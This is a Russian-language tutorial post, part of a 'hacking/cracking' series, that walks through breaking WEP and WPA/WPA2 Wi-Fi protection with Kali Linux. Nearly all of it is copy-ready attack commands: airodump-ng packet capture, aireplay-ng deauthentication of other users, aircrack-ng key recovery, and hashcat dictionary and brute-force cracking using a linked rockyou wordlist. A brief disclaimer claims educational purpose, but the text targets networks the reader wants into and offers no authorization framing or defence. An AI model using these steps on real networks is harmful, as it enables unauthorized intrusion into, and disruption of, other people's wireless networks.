35

<Обучение от малого до великого> //Хакерство (Крэкерство) #4.

Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.


В данном уроке мы рассмотрим различные способы взлома защищённых WiFi точек при помощи дистрибутива Kali Linux.


Ниже описанные махинации не работают с Kali Linux'ом установленном на VirtualBox. Так что стоит либо сделать обычный установщик USB с Kali и от туда из режима live проворачивать данные действия (главное не забудьте скинуть все полученные файлы на основную машину, иначе они не сохранятся), либо установить на раздел жёсткого диска/целиком на жёсткий диск. Вы можете посмотреть подробную установку Kali в моих прошлых уроках.


Для справки:

()- в скобках будут уточнения.

""- в кавычках будут уточнения насчёт ввода чего-либо

... ...- отступления от темы для нужного уточнения


I) Технология защиты беспроводной сети WEP.

Совершенно не будет проблем получить доступ к данной сети. Можно сказать, что люди с WEP защитой просто дарят пароль. Соответственно такой защиты мало в настоящее время, но найти до сих пор можно. Начнём взлом.


root@571:~#iwconfig

root@571:~#airmon-ng start wlan0 (<- вводим сетевую карту в режим мониторинга)

root@571:~#iwconfig (проверяете, появилось ли новое значение)

root@571:~#airodump-ng wlan0mon (Появится таблица с нужными нам свойствами)

root@571:~#airodump-ng --bssid "Вставляем значение из столбца BSSID нужной нам (WEP) WiFi точки" --channel "Вставляем значение из столбца CH" -w /tmp/wep/ wlan0mon

... На данном моменте нужно ждать примерно 200.000 frames

Останавливаем процесс, когда frames накапали ...

root@571:~#cd /tmp/

root@571:~#ls -l (Просматриваете, есть ли файл wep-01.cap)

root@571:~#aircrack-ng wep-01.cap

... При нахождении нужного ключа появится надпись KEY FOUND!

Переписываете в блокнот последовательно все символы за исключение ":".

Должно получится что-то наподобие- 5R2IF4HG824F11YJ361743I2N8 (26 символов)

Далее подключаемся к роутеру без автоматики. У вас попросят ключ. Вставляете его и всё готово.


II) Технология защиты беспроводной сети WPA/WPA2

Данная защита ушла в лучшую сторону от старечка WEP, но всё равно остаётся уязвимой.

root@571:~#iwconfig

root@571:~#airmon-ng start wlan0 (<- вводим сетевую карту в режим мониторинга)

root@571:~#iwconfig (проверяете, появилось ли новое значение)

root@571:~#airodump-ng wlan0mon (Появится таблица с нужными нам свойствами)

root@571:~#airodump-ng --bssid "Вставляем значение из столбца BSSID нужной нам (WPA/WPA2) WiFi точки" --channel "Вставляем значение из столбца CH" -w /tmp/wep/ wlan0mon

... На данном моменте нужно ждать примерно 200.000 frames

Останавливаем процесс, когда frames накапали

И_Л_И

Если вы не хотите ждать, можете воспользоваться лёгкой альтернативой- деавторизировать пользователя в данной сети ...

root@571:~#aireplay-ng -0 1 -a "Вставляем значение из столбца BSSID нужной нам (WPA/WPA2) WiFi точки" -c "Вставляем значение из столбца STATION одного из пользователей данной сети для деавторизации" wlan0mon

root@571:~#cd /tmp/

root@571:~#ls -l (Просматриваете, есть ли файл wpa-01.cap)

root@571:~#aircrack-ng wpa-01.cap -J wpa-01.hccap

... Получаем файл wpa-01.hccap

Далее нужен уже соответственно подбирать по словарю получившиеся данные, либо брутфорсить.


1.1. Пример подбора по словарю:

hashcat -m 2500 /root/hs/wpa-01.hccap /root/rockyou.txt (rockyou.txt- это словарь часто всего встречаемых паролей, (http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2) весит он ~140Mb, в архиве ~60Mb)).

И просто соответственно ждёте пока не Kali не найдёт нужный вам пароль.


1.2. Второй вариант подбора по словарю (Windows):

Перекидываете файл на жёсткий диск Windows.

Скачиваете программу Hashcat. (https://hashcat.net/hashcat/)

Перекидываете файл .hccap и rockyou.txt в папку с .exe файлом hashcat.

Запускаете CMD от имени Администратора.

>cd Hashcat

>Hashcat64.exe -m 2500 wpa-01.hccap rockyou.txt

В итоге при успешном подборе получаем вкратце следующее:

DAP- "ненужные числа":"ненужные символы":"нужный пароль"


2. Пример работы брутфорса:

hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d (Но в этом есть минус, данный брутфорс лишь выводит числа без иных символов).


Надеюсь вам понравилось. В дальнейшем буду продолжать опубликовывать статьи по дистрибутиву Kali Linux.


Связаться со мной можно в ВК: https://vk.com/hydra571.

<Обучение от малого до великого> //Хакерство (Крэкерство) #4. Kali, Linux, Хакеры, Крэкерство, Обучение, Wi-Fi, Длиннопост

GNU/Linux

1.2K пост15.6K подписчика

Правила сообщества

Все дистрибутивы хороши.

Будьте людьми.